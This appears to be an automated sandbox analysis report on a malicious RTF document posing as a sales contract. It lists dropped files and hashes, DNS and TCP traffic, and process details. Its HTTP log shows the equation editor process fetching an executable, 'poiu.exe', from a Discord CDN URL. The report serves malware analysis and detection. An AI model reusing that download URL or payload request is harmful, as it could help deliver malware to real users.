      Preview: L..................F.... ...[._..{..[._..{...'..L...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R.. .SALES-~1.DOC..~.......Q.y.Q.y*...8.....................S.a.l.e.s.-.c.o.n.t.r.a.c.t.-.d.e.a.h.o.-.1.8.0.5.2.1.-.p.o.w.e.r.u.a.e...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\216041\Users.user\Desktop\Sales-contract-deaho-180521-poweruae.doc.?.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.a.l.e.s.-.c.o.n.t.r.a.c.t.-.d.e.a.h.o.-.1.8.0.5.2.1.-.p.o.w.e.r.u.a.e...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.
      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):146
      Entropy (8bit):4.668875111577241
      Encrypted:false
      SSDEEP:3:M1jOBCf2kKZdtubCf2kKZdtmX1jOBCf2kKZdtv:M8BiKZuiKZZBiKZ/
      MD5:B37FAB42EC258956E4AFC0DB0A663466
      SHA1:81CBAD967C197A07015124C7452922302DCD3B85
      SHA-256:BB498E8701F99BB55FBF2D91136163C12287B798450D187CB1148C728AB44C07
      SHA-512:1860E297513D71EE1254F03C7403A9B87EB2B5E8C311F7099F4AACD418029235C5959227587BB9F2ECA2DD985BC210FCAAE2618BD1740D547B5956E47F288EF5
      Malicious:false
      Reputation:low
      Preview: [doc]..Sales-contract-deaho-180521-poweruae.LNK=0..Sales-contract-deaho-180521-poweruae.LNK=0..[doc]..Sales-contract-deaho-180521-poweruae.LNK=0..
      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):162
      Entropy (8bit):2.431160061181642
      Encrypted:false
      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
      MD5:39EB3053A717C25AF84D576F6B2EBDD2
      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
      Malicious:false
      Reputation:high, very likely benign file
      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
      C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:Little-endian UTF-16 Unicode text, with no line terminators
      Category:dropped
      Size (bytes):2
      Entropy (8bit):1.0
      Encrypted:false
      SSDEEP:3:Qn:Qn
      MD5:F3B25701FE362EC84616A93A45CE9998
      SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
      SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
      SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
      Malicious:false
      Reputation:high, very likely benign file
      Preview: ..
      C:\Users\user\Desktop\~$les-contract-deaho-180521-poweruae.doc
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):162
      Entropy (8bit):2.431160061181642
      Encrypted:false
      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
      MD5:39EB3053A717C25AF84D576F6B2EBDD2
      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
      Malicious:false
      Reputation:high, very likely benign file
      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

      Static File Info

      General

      File type:Rich Text Format data, unknown version
      Entropy (8bit):4.303878963614348
      TrID:
      • Rich Text Format (5005/1) 55.56%
      • Rich Text Format (4004/1) 44.44%
      File name:Sales-contract-deaho-180521-poweruae.doc
      File size:4776
      MD5:e8453860de1826d58e0f5de9e04f11ea
      SHA1:ac2e4b588051a6ba7bcef104e7027f9ce1036b14
      SHA256:d18da684313ab3fe2b403fca933096ce347b800ef94b5a71dfc8e3a607f95dcd
      SHA512:95a34ccf3c3de9ea652f0caf914659e1581e6d144ad51e01d51dce7b5bc42ea5ab94bb570eb3bc9671b5bbd55c75538a56a6e8a013603610090fcec4858d13cd
      SSDEEP:96:JCVQAzQQ00Sbswi5IsPjsfetevF6bEjTOQCn2nR:JCNQD0Shistrd
      File Content Preview:{\rtf9784{\object74053332 74053332 \'' \objlink58854666\+\objupdate5530920355309203\objw8682\objh1794{\*\objdata481566 {{{{{{{{{{{{{{{{{{{{\bin000000

      File Icon

      Icon Hash:e4eea2aaa4b4b4a4

      Static RTF Info

      Objects

      IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
      000000111hno
      1000000B5hno

      Network Behavior

      Network Port Distribution

      TCP Packets

      TimestampSource PortDest PortSource IPDest IP
      May 19, 2021 10:38:02.993972063 CEST4916580192.168.2.22162.159.135.233
      May 19, 2021 10:38:03.036247015 CEST8049165162.159.135.233192.168.2.22
      May 19, 2021 10:38:03.036412001 CEST4916580192.168.2.22162.159.135.233
      May 19, 2021 10:38:03.036863089 CEST4916580192.168.2.22162.159.135.233
      May 19, 2021 10:38:03.080743074 CEST8049165162.159.135.233192.168.2.22
      May 19, 2021 10:38:03.089543104 CEST8049165162.159.135.233192.168.2.22
      May 19, 2021 10:38:03.089683056 CEST4916580192.168.2.22162.159.135.233
      May 19, 2021 10:38:03.115010023 CEST49166443192.168.2.22162.159.135.233
      May 19, 2021 10:38:03.156987906 CEST44349166162.159.135.233192.168.2.22
      May 19, 2021 10:38:03.157182932 CEST49166443192.168.2.22162.159.135.233
      May 19, 2021 10:38:03.168504000 CEST49166443192.168.2.22162.159.135.233
      May 19, 2021 10:38:03.210413933 CEST44349166162.159.135.233192.168.2.22
      May 19, 2021 10:38:03.211878061 CEST44349166162.159.135.233192.168.2.22
      May 19, 2021 10:38:03.211925983 CEST44349166162.159.135.233192.168.2.22
      May 19, 2021 10:38:03.212018967 CEST49166443192.168.2.22162.159.135.233
      May 19, 2021 10:38:03.232162952 CEST49166443192.168.2.22162.159.135.233
      May 19, 2021 10:38:03.274086952 CEST44349166162.159.135.233192.168.2.22
      May 19, 2021 10:38:03.274559975 CEST44349166162.159.135.233192.168.2.22
      May 19, 2021 10:38:03.274612904 CEST49166443192.168.2.22162.159.135.233
      May 19, 2021 10:38:03.533233881 CEST49166443192.168.2.22162.159.135.233
      May 19, 2021 10:38:03.575202942 CEST44349166162.159.135.233192.168.2.22
      May 19, 2021 10:38:03.831617117 CEST44349166162.159.135.233192.168.2.22
      May 19, 2021 10:38:03.831672907 CEST44349166162.159.135.233192.168.2.22
      May 19, 2021 10:38:03.831830978 CEST49166443192.168.2.22162.159.135.233
      May 19, 2021 10:38:03.832951069 CEST49166443192.168.2.22162.159.135.233
      May 19, 2021 10:38:03.832978010 CEST49166443192.168.2.22162.159.135.233
      May 19, 2021 10:38:03.855190039 CEST4916580192.168.2.22162.159.135.233

      UDP Packets

      TimestampSource PortDest PortSource IPDest IP
      May 19, 2021 10:38:02.857032061 CEST5219753192.168.2.228.8.8.8
      May 19, 2021 10:38:02.919687033 CEST53521978.8.8.8192.168.2.22
      May 19, 2021 10:38:02.920067072 CEST5219753192.168.2.228.8.8.8
      May 19, 2021 10:38:02.981113911 CEST53521978.8.8.8192.168.2.22

      DNS Queries

      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
      May 19, 2021 10:38:02.857032061 CEST192.168.2.228.8.8.80xd372Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
      May 19, 2021 10:38:02.920067072 CEST192.168.2.228.8.8.80xd372Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)

      DNS Answers

      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
      May 19, 2021 10:38:02.919687033 CEST8.8.8.8192.168.2.220xd372No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
      May 19, 2021 10:38:02.919687033 CEST8.8.8.8192.168.2.220xd372No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
      May 19, 2021 10:38:02.919687033 CEST8.8.8.8192.168.2.220xd372No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
      May 19, 2021 10:38:02.919687033 CEST8.8.8.8192.168.2.220xd372No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
      May 19, 2021 10:38:02.919687033 CEST8.8.8.8192.168.2.220xd372No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
      May 19, 2021 10:38:02.981113911 CEST8.8.8.8192.168.2.220xd372No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
      May 19, 2021 10:38:02.981113911 CEST8.8.8.8192.168.2.220xd372No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
      May 19, 2021 10:38:02.981113911 CEST8.8.8.8192.168.2.220xd372No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
      May 19, 2021 10:38:02.981113911 CEST8.8.8.8192.168.2.220xd372No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
      May 19, 2021 10:38:02.981113911 CEST8.8.8.8192.168.2.220xd372No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)

      HTTP Request Dependency Graph

      • cdn.discordapp.com

      HTTP Packets

      Session IDSource IPSource PortDestination IPDestination PortProcess
      0192.168.2.2249165162.159.135.23380C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      TimestampkBytes transferredDirectionData
      May 19, 2021 10:38:03.036863089 CEST1OUTGET /attachments/843685789120331799/844316591284944986/poiu.exe HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: cdn.discordapp.com
      Connection: Keep-Alive
      May 19, 2021 10:38:03.089543104 CEST1INHTTP/1.1 301 Moved Permanently
      Date: Wed, 19 May 2021 08:38:03 GMT
      Transfer-Encoding: chunked
      Connection: keep-alive
      Cache-Control: max-age=3600
      Expires: Wed, 19 May 2021 09:38:03 GMT
      Location: https://cdn.discordapp.com/attachments/843685789120331799/844316591284944986/poiu.exe
      cf-request-id: 0a255f6a400000248421971000000001
      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=CEu1%2Bc7R%2BdSj9CkiKIqL%2FUTU00cLrJ%2BhQDVbQNjUmI0rBow02ZswBDPhkhxJQAdmi%2Bkw3HH1qFRZHNTp269gdPOYu4u4MjekPvVwSsXdw1oeVHM%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 651c01bd39d62484-FRA
      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
      Data Raw: 30 0d 0a 0d 0a
      Data Ascii: 0


      HTTPS Packets

      TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
      May 19, 2021 10:38:03.211925983 CEST162.159.135.233443192.168.2.2249166CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Jan 19 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Wed Jan 19 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
      CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

      Code Manipulations

      Statistics

      CPU Usage

      Click to jump to process

      Memory Usage

      Click to jump to process

      High Level Behavior Distribution

      Click to dive into process behavior distribution

      Behavior

      Click to jump to process

      System Behavior

      General

      Start time:10:37:32
      Start date:19/05/2021
      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      Wow64 process (32bit):false
      Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
      Imagebase:0x13fb00000
      File size:1424032 bytes
      MD5 hash:95C38D04597050285A18F66039EDB456
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:10:37:34
      Start date:19/05/2021
      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      Wow64 process (32bit):true
      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Imagebase:0x400000
      File size:543304 bytes
      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Disassembly

      Reset < >